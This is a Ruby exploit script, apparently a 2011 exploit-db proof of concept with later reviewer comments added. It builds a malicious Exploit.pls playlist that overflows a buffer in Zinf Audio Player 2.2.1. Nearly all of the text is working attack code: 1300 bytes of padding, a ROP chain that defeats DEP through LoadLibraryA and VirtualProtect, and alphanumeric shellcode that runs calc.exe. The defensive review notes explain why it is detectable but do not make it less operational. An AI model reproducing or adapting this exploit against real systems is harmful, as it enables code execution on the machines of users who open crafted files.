#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#
# Historical (2011) proof-of-concept generator. The script does no exploitation
# itself: it only assembles a byte string and writes it to "Exploit.pls" in the
# current directory, for a human to open in the vulnerable player.
#
# Review notes (defender perspective):
#  - Every gadget address below is a hard-coded absolute address, so the file is
#    tied to the exact build and OS named in the header; per the linked
#    write-up this relies on a module loaded without ASLR, which modern
#    mitigations (system-wide ASLR, CFG) are designed to defeat.
#  - The payload has a fixed, recognisable shape (1300 bytes of 'A' padding,
#    a gadget table, then alphanumeric shellcode - see the comment on the
#    shellcode below), which makes a malicious .pls trivially detectable by
#    content inspection of playlist files.
#  - The vendor software is unmaintained; the only mitigation is not to run it.
#
# NOTE(review): `ver` is a Windows shell builtin. On a non-Windows host the
# backtick call raises Errno::ENOENT before the regex runs, so the else branch
# is not actually reached - left as-is, flagged only.
sys = `ver`
if sys =~/Windows/
  system("cls")
  system("color 4f")
else
  system("clear")
end
# Ruby has no triple-quoted strings: '''...''' is an empty literal, the banner
# literal and another empty literal, joined by adjacent-literal concatenation.
print '''
Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
Created by C4SS!0 and h1ch4m
E-mails:
C4SS!0 : louredo_@hotmail.com
h1ch4m : h1ch4m@hotmail.com
Sites:
C4SS!0 : net-fuzzer.blogspot.com
h1ch4m : net-effects.blogspot.com
'''
sleep(3)
# Address of VirtualProtect 0x7C3528DD
# Each [addr].pack('V') emits the address as a 4-byte little-endian value.
#########################################ROP FOR LOAD "msvcr71.dll"#################################
rop = [0x10002a6f].pack('V') # PUSH ESP # POP EDI # POP ESI # POP EBP # MOV EAX,1 # POP EBX # ADD ESP,30 # RETN
rop += "A" * 12
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // return address for LoadLibraryA; execution comes HERE after LoadLibraryA runs
rop += "A" * (80-rop.length) # pad the chain to exactly 80 bytes so far
rop += [0x100014e8].pack('V') # MOV EAX,EDI # POP EDI # POP ESI # RETN
rop += "G"* 8 # JUNK
rop += [0x1205017d].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN
rop += [0x112054dd].pack('V') # XCHG EAX,EBP # RETN REPLACE
rop += [0x00420044].pack('V') # POP EBP # RETN
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // return address for LoadLibraryA; execution comes HERE after LoadLibraryA runs
rop += [0x10001E11].pack('V') # POP EDI # RETN
rop += [0x7C801D7B].pack('V') # address of LoadLibraryA // fixes the EDI value for the PUSHAD
rop += [0x1200CA76].pack('V') # PUSHAD # RETN
rop += "msvcr71.dll\x00" # NUL-terminated library name consumed by LoadLibraryA
rop += "D" * 56
##########################################ROP END HERE####################################
##########################################ROP FOR VirtualProtect###########################
rop += [0x1200edf1].pack('V') # POP EDI # RETN
rop += "JJJJ" # JUNK
rop += [0x7C3528DD].pack('V') # pointer to VirtualProtect
rop += [0x00409E6A].pack('V') # MOV EAX,EBX # POP EBX #RETN 0c
rop += "PPPP"
rop += [0x0042044B].pack('V') * 3 # RETN
rop += [0x0040dc54].pack('V') # PUSH ESI # ADD AL,5E # POP EBP # RETN 04
############################ADDING TO EAX######################################
rop += [0x7C3410C3].pack('V') # POP ECX # RETN
rop += [0x00000200].pack('V') # the value that will be added to EAX
rop += [0x7C358F2C].pack('V') # ADD EAX,ECX # POP ESI # RETN
rop += "GGGG"
#####################################################################################
rop += [0x0040fd82].pack('V') # XCHG EAX,ECX # POP EBP # RETN
rop += "BBBB"
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN
rop += [0x1060fd8f].pack('V') # XCHG EAX,EBP # RETN
################################CHANGES THE PARAMETER ADDRESS#######################################
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x7c3451b9].pack('V') # POP EDX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN // address of the last VirtualProtect parameter
rop += [0x1000333e].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop += "QQQQ"
rop += [0x12007AD7].pack('V') * 10 # RETN
###################################################################################################
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN // available address
rop += [0x12011D0B].pack('V') # XCHG EAX,ECX # CMP EAX,5E5F0002 # RETN
rop += [0x12007AD7].pack('V') # RETN
rop += [0x10001436].pack('V') # MOV EAX,ECX # POP EBX # RETN
rop += "GGGG"
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x03\x00\x00"
rop += [0x11601da9].pack('V') # POP EAX # RETN
rop += "\x40\x00\x00\x00"
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN
rop += [0x12026C85].pack('V') # PUSHAD # RETN
rop += "A" * 156
#########################Go to the shellcode after the VirtualProtect call###############
rop += [0x10002e13].pack('V')# ADD EAX,ECX # RETN
rop += [0x10610e4d].pack('V')# POP ECX # RETN
rop += [0x0000012b].pack('V')# value that will be added to EAX
rop += [0x10002e13].pack('V')# ADD EAX,ECX # RETN
rop += [0x111025F1].pack('V')# CALL EAX and JMP to my Shellcode. :)
##########################################ROP END HERE#####################################
# Payload: 50-0x12 = 32 filler bytes followed by the authors' alphanumeric
# WinExec("calc.exe") shellcode (a benign proof-of-execution, per their comment).
shellcode = "\x44" * (50-0x12)
shellcode += "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK"+
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO"+
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9"+ #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ"+ #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN"+
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8"+
"WDN0SUK8WOMV4DNNTWPYWN27KA"
# Final file layout: 1300 bytes of padding, then the gadget chain, then the payload.
buf = "A" * 1300
buf += rop
buf += shellcode
print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
# Written in binary mode so the packed addresses are not newline-translated.
File.open("Exploit.pls","wb") do |f|
f.write buf
f.close # redundant: the block form of File.open closes the handle itself
print "\t\t[+]File Exploit.pls create successfully.\n"
sleep(1)
end
rescue
# NOTE(review): exits with status 0 on failure, so a caller cannot tell
# success from error by exit code; only the printed message differs.
print "**[-]Error: #{$!}\n"
exit(0)
end